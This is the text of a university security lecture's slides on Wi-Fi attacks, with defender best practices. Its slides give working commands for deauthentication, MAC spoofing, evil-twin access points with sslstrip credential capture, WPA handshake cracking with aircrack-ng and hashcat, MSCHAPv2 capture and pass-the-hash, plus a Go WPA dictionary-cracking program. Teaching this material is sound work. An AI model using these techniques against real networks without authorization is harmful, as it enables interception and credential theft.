Wi-Fi: a security overview


Slide 1/60: Wi-Fi: a security overview
Pierre Pavlidès, EURECOM - SysSec course, December 15, 2017

Slide 2/60: Before we start
Pierre Pavlidès, @rogdham
- EURECOM student 2011-2012
- Security consultant for 4 years
Want to work in the industry? Send me your CV!
- Penetration testing, forensics, reverse engineering, Python dev
- Paris, Lyon (I work there!), Marseille...

Slide 3/60: Obligatory XKCD
https://xkcd.com/416/

Slide 4/60: Agenda
1. General
2. Open Wi-Fi
3. Adding some security: WEP, WPA
4. WPA personal
5. WPA enterprise
6. Conclusion

Slide 5/60: Agenda (section 1: General)

Slide 6/60: Wi-Fi you say?
Wi-Fi: technology based on the IEEE 802.11 standard

  Protocol   Band        Max speed   Date
  802.11a    5 GHz       54 Mb/s     1999
  802.11b    2.4 GHz     11 Mb/s     1999
  802.11g    2.4 GHz     54 Mb/s     2003
  802.11n    2.4/5 GHz   600 Mb/s    2009

Many Wi-Fi adapters today are dual-band

Slide 7/60: Channels in the 2.4 GHz band
- Channels are overlapping
- Some are legally restricted
  - Channel 14 only used in Japan
  - Channels 12 & 13 are power restricted in the US
  - In France: max emission power of 100 mW EIRP
https://www.arcep.fr/index.php?id=9272
https://en.wikipedia.org/wiki/list_of_wlan_channels

Slide 8/60: Modes of operation
Infrastructure mode
- Access point (AP) + stations (STA) = basic service set (BSS)
- APs in the same distribution system (DS) = extended service set (ESS)
- Roaming between APs in the same ESS
- The AP relays packets between STAs
Ad hoc networks
- No AP: peer-to-peer mode
- STAs communicate directly with each other
Monitor mode
- Not a wireless mode but a configuration mode of the driver
- Like promiscuous mode for a wired card

Slide 9/60: Hardware choice
Things to consider:
- 2.4 GHz / 5 GHz / dual-band
- Internal card / USB adapter
- Emission & reception power
- Antenna: omnidirectional / directional
And for pentesting: full-fledged drivers in Linux
- Limited to some models in the 2.4 GHz band
- Still a huge issue in the 5 GHz band

Slide 10/60: Hardware: popular choices for pentesting in the 2.4 GHz band
- Alpha Network (26 €): allows going above the legal emission power
- TP-Link TL-WN722N (9 €): since v2, not 100% Linux driver support (yet)

Slide 11/60: Practice time
List your Wi-Fi adapters:
  $ iwconfig
  lo          no wireless extensions.
  enp1s0      no wireless extensions.
  wlp0s20f0u2 IEEE 802.11  ESSID:off/any
              Mode:Managed  Access Point: Not-Associated  Tx-Power=0 dBm
              Retry short limit:7  RTS thr:off  Fragment thr:off
              Power Management:off

  # airmon-ng
  PHY    Interface    Driver     Chipset
  phy0   wlp0s20f0u2  ath9k_htc  Qualcomm Atheros Communications AR9271 802.11n
If the predictable network interface names feature is disabled, your Wi-Fi adapter will likely be wlan0, wlan1, etc.

Slide 12/60: Monitor mode
  # airmon-ng start <interface>
- Lists possibly interfering processes (and offers to kill them)
- Renames the interface, adding "mon" at the end
  $ iwconfig wlp0s20f0u2mon
  wlp0s20f0u2mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm
                  Retry short limit:7  RTS thr:off  Fragment thr:off
                  Power Management:off

Slide 13/60: Wi-Fi network scanning
  # airodump-ng <interface>
- Space to pause the output
- -c <channel>, or for the 5 GHz band: -b a
- -N <SSID> or -R <SSID-regex>
- -d <BSSID> (and -m <BSSID-mask>)
- To filter out unassociated STAs: -a

Slide 14/60: Wi-Fi network scanning
Top part: APs
- Network: name (ESSID), type (ENC/CIPHER/AUTH), channel (CH)
- AP's MAC (BSSID)
- Signal strength (PWR/RXQ)

Slide 15/60: Wi-Fi network scanning
Bottom part: STAs
- Associated with AP: BSSID (if any)
- STA's MAC (STATION)
- Signal strength (PWR)
- How active the STA is (number of frames)

Slide 16/60: Hidden networks
- Usually, APs broadcast their SSID in beacon frames
- Useful since the SSID is required for a STA to associate with an AP: it is carried in the association request frame

Slide 17/60: Hidden networks: recovering the SSID
  BSSID              PWR  Beacons  ESSID
  11:22:33:44:55:66  -13  42       <length: 0>

  BSSID              STATION            PWR
  11:22:33:44:55:66  77:88:99:aa:bb:cc  -37
- To recover the SSID, wait for a STA to associate
- Speed-up: send disassociation frames; the STA will automatically try to re-associate
- airmon-ng will eavesdrop the association request, extract the SSID and display it
  # aireplay-ng -a 11:22:33:44:55:66 -c 77:88:99:aa:bb:cc -0 1 <interface>

Slide 18/60: Agenda (section 2: Open Wi-Fi)

Slide 19/60: Open Wi-Fi
- No authentication: anyone can join the network
- Everything is sent in clear text
- Passive man-in-the-middle (MitM) attack: just set your card in monitor mode

Slide 20/60: MAC based access control
- Allow association only for clients whose Media Access Control (MAC) address is in a whitelist
- Wait, MAC addresses are sent in cleartext, right?
  BSSID              PWR  Beacons  ESSID
  11:22:33:44:55:66  -13  42       DatNetwork

  BSSID              STATION            PWR
  11:22:33:44:55:66  77:88:99:aa:bb:cc  -37
- Impersonate the MAC and get access
  # ip link set dev <interface> address 77:88:99:aa:bb:cc

Slide 21/60: Captive portals: overview
- Most open Wi-Fi networks are protected with captive portals
- Still no authentication to join the network, but segregated on a different VLAN
Overview
1. You join an open network
2. You are on a separate VLAN
3. You somehow open your browser on the captive portal (next slide)
4. You enter credentials
5. You are transparently moved to another VLAN with more access

Slide 22/60: Captive portals: redirection
- Method 1: MitM all HTTP requests, insert a redirection
- Method 2: lying DNS server pointing to the captive portal
How to get the user to browse an HTTP (not HTTPS) page?
- Unusual nowadays thanks to Let's Encrypt, HSTS, etc.
- Browser and OS support, e.g. Chrome visits http://www.gstatic.com/generate_204
Issue with method 1: DNS queries are not filtered
- Maybe build a simple tunnel through port 53
- Or a DNS tunnel, e.g. with iodine
- Allows the attacker to access the Internet, not the internal network

Slide 23/60: Captive portals on open Wi-Fi: no authentication
- Captive portals: access control based on MAC address
- The previous attack still works
  1. Get the MAC of an authenticated STA
  2. Impersonate the MAC
  # ip link set dev <interface> address 77:88:99:aa:bb:cc

Slide 24/60: Captive portals on open Wi-Fi: no encryption
- Open Wi-Fi provides no confidentiality of data
- Maybe the captive portal is in HTTP (and not HTTPS)?
- Passive MitM attack: get the credentials

Slide 25/60: Evil Twin attack: active MitM
- Devices will connect to the AP with the best reception: let's be that AP!
  - Broadcast the same SSID
  - Relay all data to the real AP
  - Play with emission power, beacon frame interval, proximity to the victim
  - Send disassociation frames
- This attack allows for active MitM: edit data on the fly
- Create an AP (e.g. with hostapd + dnsmasq), enable IP forwarding
  # sysctl -w net.ipv4.ip_forward=1

Slide 26/60: Evil Twin attack on captive portal
- We now have access to the network (RealAP sees the Attacker's MAC)
- Without modifying any of the relayed data
- But we don't have the credentials (HTTPS)

Slide 27/60: Evil Twin attack + sslstrip
  # iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  $ sslstrip -w data.log
We have the credentials!

Slide 28/60: Evil Twin attack + sslstrip: iOS auth popup difference (screenshot slide)

Slide 29/60: Evil Twin attack: having fun with active MitM
- Getting credentials is quite fun already
- What about changing the img src in all pages?

Slide 30/60: Open Wi-Fi: conclusion
- No authentication
  - Easy to get passive MitM
  - Not difficult to get active MitM
- Captive portals
  - Still no authentication to join the Wi-Fi network
  - Can be bypassed
  - Widely deployed: for guests (corporate world) or customers (hotels, airports...)
So protect yourself: double-check HTTPS, use VPNs

Slide 31/60: Agenda (section 3: Adding some security: WEP, WPA)

Slide 32/60: Wired Equivalent Privacy (WEP)
- Open networks provide no authentication
- Adding authentication afterwards (captive portals) is not enough
WEP (1997)
- Simple encryption based on RC4
- Shared key: 64 bits or 128 bits
Since 2001: end of the WEP era
- Main issue: RC4 with key + IV reuse
- Many attacks; now attackers retrieve keys within 1 minute
- Today nobody uses WEP anymore (hopefully)

Slide 33/60: Wi-Fi Protected Access (WPA)
WPA1 (2003)
- Created to address WEP issues
- No change in hardware needed: uses the TKIP algorithm (making sure RC4 is used with a different key and IV)
WPA2 (2004)
- IEEE 802.11i
- Can use TKIP or CCMP (AES-based)
- Also, CCMP backported to WPA1
Today, no real difference between WPA1 and WPA2
- But prefer CCMP: some attacks on TKIP exist (e.g. PacSec 2008)

Slide 34/60: WPA flavours
First phase: getting the master key (MK)
- Exchanges are not secured yet
- Can be PSK (WPA personal) or EAP-based (WPA enterprise)
Second phase: exchanging other secrets
- Four-way handshake
- Secured thanks to the MK
- Each party proves knowledge of the MK (authentication)
Last phase: using the secrets
- TKIP / CCMP to protect communications

Slide 35/60: Agenda (section 4: WPA personal)

Slide 36/60: WPA personal (i.e. with PSK)
- Pre-shared key (PSK): 8 to 63 printable ASCII characters (0x20 to 0x7e)
- MK = PBKDF2(PSK, SSID)
Overview of the attack:
1. Capture a four-way handshake (disassociate a STA if needed)
2. Run a dictionary-based attack on the PSK used in that handshake

Slide 37/60: WPA 4-way handshake (diagram slide)
The attack only requires the first 2 frames

Slide 38/60: WPA 4-way handshake: testing a PSK
  MK  = PBKDF2(PSK, SSID)
  PTK = PRF(MK, MAC_AP, MAC_STA, ANonce, SNonce)
  MIC = HMAC-X(PTK[0:15], frame)
where X is MD5 for WPA and SHA1 for WPA2
In other words, we need:
- the PSK to be tested
- the SSID
- the first two frames of the handshake
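The PSK test from slides 36 to 38, written out as an added Go example (not code from the slides, from aircrack-ng or from hashcat): PBKDF2 for the MK, the IEEE 802.11i PRF-512 for the PTK, and the EAPOL Key MIC check with KCK = PTK[0:16] (HMAC-MD5 for WPA, HMAC-SHA1 for WPA2), run as a dictionary attack over a constructed message 2. The ESSID DatNetwork and the two MAC addresses are the sample values from the slides; the nonces, the EAPOL frame layout used for the sample and the candidate PSKs are constructed here. The passphrase "password" / SSID "IEEE" pair printed by main() is the PMK test vector from the 802.11i standard, so the PBKDF2 step can be checked against it.

```go
package main

import (
	"bytes"
	"crypto/hmac"
	"crypto/md5"
	"crypto/sha1"
	"encoding/hex"
	"fmt"
	"hash"
)

// pbkdf2Sha1 is PBKDF2-HMAC-SHA1 written out; WPA uses 4096 iterations and 32 output bytes.
func pbkdf2Sha1(psk, ssid []byte, iter, keyLen int) []byte {
	var out []byte
	for block := byte(1); len(out) < keyLen; block++ {
		mac := hmac.New(sha1.New, psk)
		mac.Write(ssid)
		mac.Write([]byte{0, 0, 0, block}) // big-endian block index
		u := mac.Sum(nil)
		t := append([]byte(nil), u...)
		for i := 1; i < iter; i++ {
			mac.Reset()
			mac.Write(u)
			u = mac.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// ptkFromPmk is the 802.11i PRF-512 over min/max of the MACs and of the nonces.
func ptkFromPmk(pmk, apMac, staMac, anonce, snonce []byte) []byte {
	if bytes.Compare(apMac, staMac) > 0 {
		apMac, staMac = staMac, apMac
	}
	if bytes.Compare(anonce, snonce) > 0 {
		anonce, snonce = snonce, anonce
	}
	var ptk []byte
	for i := byte(0); i < 4; i++ {
		mac := hmac.New(sha1.New, pmk)
		mac.Write([]byte("Pairwise key expansion\x00"))
		mac.Write(bytes.Join([][]byte{apMac, staMac, anonce, snonce, {i}}, nil))
		ptk = mac.Sum(ptk)
	}
	return ptk[:64]
}

// eapolMic is the 16-byte Key MIC over the EAPOL frame (MIC field zeroed) keyed with KCK = PTK[0:16].
func eapolMic(kck, frame []byte, wpa2 bool) []byte {
	var h func() hash.Hash = md5.New // WPA/TKIP: HMAC-MD5
	if wpa2 {
		h = sha1.New // WPA2/CCMP: HMAC-SHA1 truncated to 16 bytes
	}
	mac := hmac.New(h, kck)
	mac.Write(frame)
	return mac.Sum(nil)[:16]
}

// handshake is what an observer learns from the first two frames of the 4-way handshake.
type handshake struct {
	ssid, apMac, staMac, anonce, snonce []byte
	frame2, mic                         []byte // message 2 with its MIC field zeroed, and the MIC it carried
	wpa2                                bool
}

// micMatches tests one PSK candidate the way aircrack-ng and hashcat do.
func micMatches(h handshake, psk string) bool {
	pmk := pbkdf2Sha1([]byte(psk), h.ssid, 4096, 32)
	ptk := ptkFromPmk(pmk, h.apMac, h.staMac, h.anonce, h.snonce)
	return hmac.Equal(eapolMic(ptk[:16], h.frame2, h.wpa2), h.mic)
}

// crackPsk is the dictionary attack: one PBKDF2 (4096 HMACs) per candidate is what makes it slow.
func crackPsk(h handshake, dict []string) (string, bool) {
	for _, c := range dict {
		if micMatches(h, c) {
			return c, true
		}
	}
	return "", false
}

// sampleHandshake is constructed, not captured: it plays the STA side of message 2 with the given PSK.
func sampleHandshake(psk string, wpa2 bool) handshake {
	h := handshake{ssid: []byte("DatNetwork"), wpa2: wpa2,
		apMac: []byte{0x11, 0x22, 0x33, 0x44, 0x55, 0x66}, staMac: []byte{0x77, 0x88, 0x99, 0xaa, 0xbb, 0xcc},
		anonce: bytes.Repeat([]byte{0xa1}, 32), snonce: bytes.Repeat([]byte{0x5e}, 32)}
	// Minimal EAPOL-Key frame: 4-byte EAPOL header + 95-byte key descriptor; SNonce at
	// offset 17, the 16-byte MIC field at offset 81 left zeroed (as it is when the MIC is computed).
	h.frame2 = make([]byte, 99)
	h.frame2[1] = 3 // packet type EAPOL-Key
	copy(h.frame2[17:49], h.snonce)
	pmk := pbkdf2Sha1([]byte(psk), h.ssid, 4096, 32)
	h.mic = eapolMic(ptkFromPmk(pmk, h.apMac, h.staMac, h.anonce, h.snonce)[:16], h.frame2, wpa2)
	return h
}

func main() {
	fmt.Println("PMK(password, IEEE):", hex.EncodeToString(pbkdf2Sha1([]byte("password"), []byte("IEEE"), 4096, 32)))
	h := sampleHandshake("correct horse battery", true)
	fmt.Println(crackPsk(h, []string{"password", "12345678", "correct horse battery"}))
}
```

The point for a defender is visible in the cost structure: everything after PBKDF2 is a handful of HMACs, so the only thing standing between a captured handshake and the PSK is the 4096-iteration PBKDF2 per candidate and the size of the candidate space.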

Slide 39/60: Cracking the WPA 4-way handshake on CPU with aircrack-ng
  $ aircrack-ng -w <dictionary.txt> <capture.cap> [-e <SSID>]
Test the speed on your machine (uses all CPU cores):
  $ aircrack-ng -S
Normal results: between 1 000 and 10 000 PSKs tested per second

Slide 40/60: Cracking the WPA 4-way handshake on GPU with hashcat
  $ aircrack-ng <capture.cap> -J <capture.hccap>
  $ hashcat -m 2500 <capture.hccap> <dictionary.txt>
  $ hashcat -m 2500 -a3 <capture.hccap> '?d?d?d?d?d?d?d?d'
Test the speed on your machine (uses all CPU cores and GPUs, depending on the installation: OpenCL):
  $ hashcat -m 2500 -b
GeForce GTX 1080 Ti: 500 000 PSKs tested per second
Expected results for almost any GPU model on the hashcat forums

Slide 41/60: WPA 4-way handshake: cracking speeds
You buy some good GPU... 1 000 000 PSKs tested per second

  PSK length   PSK charset   Duration
  8            0-9           2 min          (min length)
  8            0-9a-f        1h12
  8            a-z           2.5 days
  8            a-z0-9        33 days
  8            a-zA-Z0-9     7 years
  26           0-9A-F        10^17 years    (ISP router)
  63           \x20-\x7e     10^112 years   (max complexity)

Slide 42/60: WPA PSK: once you have the PSK
- Obviously, you can connect to the network with the PSK, and then try to attack other hosts, etc.
- It is also possible to decrypt network captures
  - Allows seeing the traffic of other STAs
  - The 4-way handshake of that STA needs to be in the capture
  $ airdecap-ng -e <ESSID> -p <PSK> <capture.cap>

Slide 43/60: WPA PSK: conclusion
PSK cracking
- Create good dictionaries (e.g. Alice1996)
- If the PSK is strong, you will never get it
Best practices (defender side)
- Use a strong PSK
- Change the PSK periodically
- Should not be used in enterprise environments: needs to be changed every time an employee leaves the company

Slide 44/60: Agenda (section 5: WPA enterprise)

Slide 45/60: WPA enterprise
Many Extensible Authentication Protocols (EAP) can be used with WPA. The most widely deployed are:
- PEAP/EAP-MSCHAPv2: STA authentication with domain credentials
- EAP-TLS: mutual authentication via server & client certificates

Slide 46/60: WPA PEAP/MSCHAPv2
PEAP: a TLS tunnel is created between the STA and the RADIUS server
- The STA checks the certificate of the RADIUS server
Then the EAP-MSCHAPv2 protocol is performed
- Usually with user credentials (domain)
- Sometimes with machine credentials

Slide 47/60: MSCHAPv2 protocol
  NT = MD4(UserPassword)
  ServerChal is randomly generated by the RADIUS server
  ClientChal is randomly generated by the STA
  ChalHash = SHA1(ClientChal || ServerChal || Username)[0:7]
  ChalResponse = DES_{NT[0:6]}(ChalHash) || DES_{NT[7:13]}(ChalHash) || DES_{NT[14:20]}(ChalHash)
  AuthResponse = Φ(NT, ChalResponse, ChalHash)

Slide 48/60: MSCHAPv2 and NetNTLMv1
  ChalResponse = DES_{NT[0:6]}(ChalHash) || DES_{NT[7:13]}(ChalHash) || DES_{NT[14:20]}(ChalHash)
- Only the third frame is needed
- From an attacker's point of view, this is the same as NetNTLMv1
Naive cracking:
1. Compute NT = MD4(UserPass)
2. Check if each part of the DES encryption matches the ChalResponse

Slide 49/60: MSCHAPv2/NetNTLMv1 (diagram slide)

Slide 50/60: MSCHAPv2/NetNTLMv1: improving the cracking
- We can recover the last 2 bytes of the NT by pure bruteforce (in seconds)
Improved cracking:
1. Compute NT = MD4(UserPass)
2. If the last 2 bytes of NT don't match, abort
3. Check if each part of the DES encryption matches the ChalResponse
As a result, we get almost the same speed as NT cracking:
  $ john --format=nt --test=10
  Raw:    43096K c/s real
  $ john --format=netntlm --test=10
  Only one salt:  41776K c/s real

Slide 51/60: Evil Twin attack WPA PEAP/EAP-MSCHAPv2
Overview of the attack:
1. Evil Twin access point with a custom certificate
2. Wait for a STA to associate with it (send disassociation frames if needed)
3. Capture the MSCHAPv2 exchanges
4. Crack MSCHAPv2
Use a patched version of hostapd: hostapd-wpe or hostapd-mana
  STA 77:88:99:aa:bb:cc IEEE 802.11: associated (aid 1)
  CTRL-EVENT-EAP-STARTED 77:88:99:aa:bb:cc
  CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
  CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
  mschapv2: username: angelcorp\alice
  challenge: f6:83:a7:b7:5c:ae:c3:fa
  response: 3a:39:bb:55:7e:06:29:f3:6c:d6:df:c0:7f:4f:b0:9d:53:54:26:29:3e:a8:c3:13
  jtr NETNTLM: angelcorp\alice:$NETNTLM$f683a7b75caec3fa$3a...
  STA 77:88:99:aa:bb:cc IEEE 802.11: disassociated

Slide 52/60: Evil Twin attack WPA PEAP/EAP-MSCHAPv2
What if the STA checks the CA of the RADIUS server?
- Needs to be enabled
- Some configurations prompt the user (with an obscure error message)
  STA 77:88:99:aa:bb:cc IEEE 802.11: associated (aid 1)
  CTRL-EVENT-EAP-STARTED 77:88:99:aa:bb:cc
  CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
  CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
  SSL: SSL3 alert: read (remote end reported an error): fatal: unknown CA
  OpenSSL: openssl_handshake - SSL_connect error:14094418:SSL routines:ssl3_read_bytes:tlsv1 alert unknown ca
  CTRL-EVENT-EAP-FAILURE 77:88:99:aa:bb:cc
  STA 77:88:99:aa:bb:cc IEEE 802.1X: authentication failed - EAP type: 0 (unknown)

Slide 53/60: MSCHAPv2/NetNTLMv1: cracking speed
GTX 1080 Ti: 30.8 G H/s, that's 3·10^10 tests per second (remember WPA PSK: 5·10^5 tests per second)

  Password length   Password charset   Duration
  14                0-9                54 min
  12                0-9a-f             2h33
  10                a-z                1h17
  9                 a-z0-9             55 min
  8                 a-zA-Z0-9          1h59
  8                 \x20-\x7e          2 days 17h

Slide 54/60: MSCHAPv2/NetNTLMv1: exhaustive search
- However, it is possible to recover the full NT by exhaustive search
- Interesting watch: https://www.youtube.com/watch?v=siidzpntdcm
- Using crack.sh: cost $20 or $200 to get the NT within 26h!
- Issue (for white hats): giving the hash to a third party

Slide 55/60: Having the NT is enough
With crack.sh, we only have the NT. However, thanks to the pass-the-hash feature of Windows, it is enough:
- To authenticate on the Wi-Fi
- To access shares
- To open sessions: use the exploit/windows/smb/psexec_psh module in Metasploit

Slide 56/60: WPA PEAP/EAP-MSCHAPv2: conclusion
EAP-MSCHAPv2 protected by PEAP (TLS)
- Evil Twin attack with own (invalid) certificate
- MSCHAPv2 challenge-response cracking
  - Very fast on CPU/GPU
  - Or just use crack.sh to get the NT
- If successful, the attacker has more than access to the network: user credentials give access to resources
Best practices (defender side)
- Force the STA to check the certificate of the RADIUS server
- Use EAP-TLS instead: each STA has its own client certificate
- In both cases: use GPOs and mobile device management (MDM)

Slide 57/60: Agenda (section 6: Conclusion)

Slide 58/60: Conclusion
Attacks on the 3 main types of Wi-Fi networks:
- Open
  - Easy to get passive/active MitM
  - Attacks on captive portals
- WPA PSK
  - Dictionary attack on the 4-way handshake
  - Will not work for a robust PSK
  - Allows accessing the network and decrypting traffic
- WPA PEAP/EAP-MSCHAPv2
  - Evil Twin attack to get the MSCHAPv2 challenge-response
  - Will not work if the certificate is properly checked
  - Dictionary attack or bruteforce of the NT
  - Allows accessing the network, and usually more
But still many topics not covered...

Slide 59/60: Going the extra mile
Captive portals
- Why does HSTS protect against sslstrip?
- What is sslstrip+/sslstrip2 doing against HSTS, is it effective?
WEP
WPA PSK
- Precomputed tables: why are they specific to some SSID?
- WPS (Wi-Fi Protected Setup): bruteforce PIN, AP protections, null PIN attack (August 2017)
- Vulnerable home routers where the PSK can be found from the SSID/BSSID (e.g. old Bbox)
WPA Enterprise
- Understand the differences between the various types of EAP available
KRACK attack (October 2017) on all WPA flavours
- What does it do exactly?
- There will probably be a public PoC at some point, look into it

Slide 60/60: Thank you!
Feel free to contact me: I'll be around this afternoon, or just send me an email!
Q&A